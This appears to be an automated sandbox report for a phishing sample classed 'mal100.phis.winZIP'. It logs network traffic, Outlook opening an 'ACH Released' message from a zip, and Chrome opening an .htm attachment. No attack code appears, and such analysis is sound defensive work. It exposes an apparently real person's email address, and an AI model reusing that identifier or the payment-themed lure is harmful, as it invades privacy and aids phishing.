          Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
          Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
          Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
          Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
          Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
          Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
          Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
          Source: unknownNetwork traffic detected: HTTP traffic on port 49674 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
          Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
          Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
          Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
          Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
          Source: unknownNetwork traffic detected: HTTP traffic on port 49677 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49683 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
          Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49700
          Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
          Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
          Source: unknownNetwork traffic detected: HTTP traffic on port 49678 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
          Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
          Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
          Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
          Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
          Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
          Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49700 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49701 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.16:49703 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 40.126.31.69:443 -> 192.168.2.16:49707 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.16:49712 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 204.79.197.200:443 -> 192.168.2.16:49713 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 204.79.197.200:443 -> 192.168.2.16:49714 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 23.1.33.206:443 -> 192.168.2.16:49716 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 204.79.197.200:443 -> 192.168.2.16:49721 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 204.79.197.200:443 -> 192.168.2.16:49718 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 204.79.197.200:443 -> 192.168.2.16:49719 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 204.79.197.200:443 -> 192.168.2.16:49720 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 204.79.197.222:443 -> 192.168.2.16:49717 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 150.171.73.254:443 -> 192.168.2.16:49726 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 150.171.73.254:443 -> 192.168.2.16:49727 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 20.236.24.53:443 -> 192.168.2.16:49729 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 204.79.197.200:443 -> 192.168.2.16:49751 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 20.236.24.53:443 -> 192.168.2.16:49754 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 51.104.34.11:443 -> 192.168.2.16:49766 version: TLS 1.2
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEWindow created: window name: CLIPBRDWNDCLASSJump to behavior
          Source: classification engineClassification label: mal100.phis.winZIP@20/64@16/9
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEFile created: C:\Users\user\Documents\Outlook Files\~Outlook Data File - NoEmail.pst.tmpJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEFile created: C:\Users\user\AppData\Local\Temp\Outlook Logging\OUTLOOK_16_0_16827_20130-20241025T1621410419-7072.etlJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
          Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
          Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" /f "C:\Users\user\AppData\Local\Temp\Temp1_Rob.Kuster@stonhard.com.zip\Rob.Kuster@stonhard.com (Primary)\Recoverable Items\Purges\ACH Released 10%2F2%2F2024 Ref.msg"
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe "C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe" "131B3A01-507D-4266-80B2-B5528E4A4C4D" "0CD3F6DC-211C-46EC-89D2-436A5971245B" "7072" "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" "WordCombinedFloatieLreOnline.onnx"
          Source: unknownProcess created: C:\Windows\System32\notepad.exe "C:\Windows\system32\notepad.exe"
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\P6FSC57M\ATT47968.htm
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2220 --field-trial-handle=1844,i,6784266776184120549,4847810179203446940,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe "C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe" "131B3A01-507D-4266-80B2-B5528E4A4C4D" "0CD3F6DC-211C-46EC-89D2-436A5971245B" "7072" "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" "WordCombinedFloatieLreOnline.onnx"Jump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\P6FSC57M\ATT47968.htmJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2220 --field-trial-handle=1844,i,6784266776184120549,4847810179203446940,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: c2r64.dllJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\System32\notepad.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\notepad.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\System32\notepad.exeSection loaded: mrmcorer.dllJump to behavior
          Source: C:\Windows\System32\notepad.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\System32\notepad.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\System32\notepad.exeSection loaded: textshaping.dllJump to behavior
          Source: C:\Windows\System32\notepad.exeSection loaded: efswrt.dllJump to behavior
          Source: C:\Windows\System32\notepad.exeSection loaded: mpr.dllJump to behavior
          Source: C:\Windows\System32\notepad.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Windows\System32\notepad.exeSection loaded: twinapi.appcore.dllJump to behavior
          Source: C:\Windows\System32\notepad.exeSection loaded: oleacc.dllJump to behavior
          Source: C:\Windows\System32\notepad.exeSection loaded: textinputframework.dllJump to behavior
          Source: C:\Windows\System32\notepad.exeSection loaded: coreuicomponents.dllJump to behavior
          Source: C:\Windows\System32\notepad.exeSection loaded: coremessaging.dllJump to behavior
          Source: C:\Windows\System32\notepad.exeSection loaded: ntmarta.dllJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{F959DBBB-3867-41F2-8E5F-3B8BEFAA81B3}\InprocServer32Jump to behavior
          Source: Google Drive.lnk.16.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
          Source: YouTube.lnk.16.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
          Source: Sheets.lnk.16.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
          Source: Gmail.lnk.16.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
          Source: Slides.lnk.16.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
          Source: Docs.lnk.16.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEWindow found: window name: SysTabControl32Jump to behavior
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEWindow detected: Number of UI elements: 13
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OfficeJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnkJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnkJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnkJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnkJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnkJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnkJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\outlook\ConfigContextData 1Jump to behavior
          Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
